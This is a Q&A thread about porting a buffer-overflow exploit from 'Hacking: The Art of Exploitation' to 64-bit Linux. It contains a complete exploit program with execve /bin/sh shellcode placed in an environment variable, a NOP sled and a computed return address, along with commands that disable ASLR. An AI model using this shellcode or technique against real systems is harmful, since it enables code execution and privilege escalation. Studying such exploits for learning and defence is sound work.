# What is the base address of a C program environment from the execle command?

Tags: c, shellcode, aslr

I am reading the book "Hacking: The art of exploitation" and I have some problems with the code of `exploit_notesearch_env.c` It is attempting to do a buffer overflow exploit by calling the program to be exploited with the `execle()` function. That way the only environment variable of the program to be exploited will be the shellcode.

My problem is that I can't figure the address of the shellcode environment variable out. The book says that the base address was `0xbffffffa` and then subtracts the size of the shellcode and the length of the program name from it to obtain the shellcode address.

This is the code of `exploit_notesearch_env.c` which calls the `notesearch` program:

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
char shellcode[]=
"SHELLCODE=\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05";

int main(int argc, char *argv[]) {
   char *env[2] = {shellcode, (char *) 0};
   uint64_t i, ret;
   char *buffer = (char *) malloc(160);

   ret = 0xbffffffa - (sizeof(shellcode)-1) - strlen("./notesearch");
   memset(buffer, '\x90', 120);
   *((uint64_t *)(buffer+120)) = ret;

   execle("./notesearch", "notesearch", buffer, (char *) 0, env);
   free(buffer);
}
```

By the way the book uses a 32 bit Linux distro while I am using Kali Linux 2019.4 64 bit version which might be the origin of the problem.

The shellcode is already adjusted for 64 bits and the program correctly overflows the buffer, but with the wrong address.

Does anyone know the right substitute for the address `0xbffffffa` from the book?

Comment: You can print the address of some stackvariable to get an idea (`printf("%p\n", &buffer);`). And don't forget to disable ASLR for the first steps. Produce coredump files and analyze them with gdb.

Comment: I have already disabled the aslr but why should I print the address of the buffer when I am only interested in the address of the SHELLCODE environment variable?

Answer (score 1):

> What is the base address of a c program environment from the execle command?

Impossible to say.

> Does anyone know the right substitute for the address `0xbffffffa` from the book?

No, nobody knows except your operating system.

---

First of all, on modern Linux systems, [Address Space Layout Randomization](https://en.wikipedia.org/wiki/Address_space_layout_randomization) (ASLR) is usually enabled by default. This means that every program you run will have different randomized base addresses for the stack, the heap, the binary itself and any other library or virtual memory page.

This randomization is done by the kernel itself. In order to disable ASLR, you can start the program under GDB (which disables it for you only for the started process), or you can temporarily disable it system-wide with the `sysctl` command, setting `kernel.randomize_va_space` to `0` for no ASLR and to `2` for normal ASLR.

```
sudo sysctl -w kernel.randomize_va_space=0 # disabled
sudo sysctl -w kernel.randomize_va_space=2 # enabled
```

*However*, even after disabling ASLR, it's still not possible to know the position of the stack beforehand, you will have to run your program under GDB at least once to check the address first (environment variables are at the bottom of the stack). There really is no other way, other than writing your own [linker script](http://www.scoberlin.de/content/media/http/informatik/gcc_docs/ld_3.html), which is not that simple.

---

If your book did not cover these concepts before, then I strongly suggest you to *find another book*, because jumping right to the code without explaining anything first doesn't make much sense.

Comment: but if I look up the address of the environment in gdb will it be the same when not using gdb and in which way can a linker script help me?

Comment: now I found the stack base address using gdb but I have to get the shellcode address I need to subtract not only the length of the shellcode and the length of "./notesearch" but also the number 2. Does anyone know the reason for this?